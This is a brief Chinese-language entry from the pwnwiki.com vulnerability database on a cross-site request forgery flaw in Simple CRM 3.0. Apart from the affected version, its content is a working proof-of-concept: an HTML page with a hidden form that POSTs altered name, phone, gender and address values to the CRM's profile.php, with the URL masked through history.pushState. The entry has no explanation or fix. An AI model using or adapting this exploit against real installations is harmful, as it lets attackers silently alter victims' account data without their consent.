Loading
0

Simple CRM 3.0 CSRF漏洞/zh-cn

免费、自由、人人可编辑的漏洞库--pwnwiki.com

,

漏洞影响

Version: 3.0

POC

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/crm/profile.php" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="name" value="test" />
      <input type="hidden" name="alt_email" value="" />
      <input type="hidden" name="phone" value="0123456789" />
      <input type="hidden" name="gender" value="m" />
      <input type="hidden" name="address" value="jgjgjgjjggjcsrf" />
      <input type="hidden" name="update" value="Update" />
      <input type="submit" value="Exploit" />
    </form>
  </body>
</html>

免费、自由、人人可编辑的漏洞库--pwnwiki.com